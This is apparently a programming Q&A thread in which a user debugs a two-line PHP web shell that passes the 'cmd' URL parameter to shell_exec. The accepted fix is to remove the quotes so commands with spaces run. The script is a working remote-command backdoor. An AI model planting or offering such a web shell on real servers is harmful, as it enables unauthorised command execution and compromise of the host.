# Reverse shell PHP with GET parameters

Tags: php, shell, get, apache2, reverse

I'm using a simple reverse shell php script:

```
$res = shell_exec($_GET['cmd']));
var_dump($res);
```

However command using spaces does not work:

```
shell.php?cmd="ls" works
shell.php?cmd="ls -lh" not working
shell.php?cmd="ls%20-lh" not working
```

I checked the error.log from my httpd server and the error showed is quite akward:

```
sh: ls -lh: command not found
```

I guess it might be due to the encoding of the string received by $_GET but I have no idea how to fix the problem.

Comment: I'm not sure if this helps... But do you get the same problem if you remove the quotes? I.e. `shell.php?cmd=ls -lh`

Comment: Wow ! it works perfectly without quotes ! Thanks !

Answer (score 0, accepted):

```
shell.php?cmd=ls -lh
```

Why worrying about quotes when you don't need them ^^

Thanks @Gowire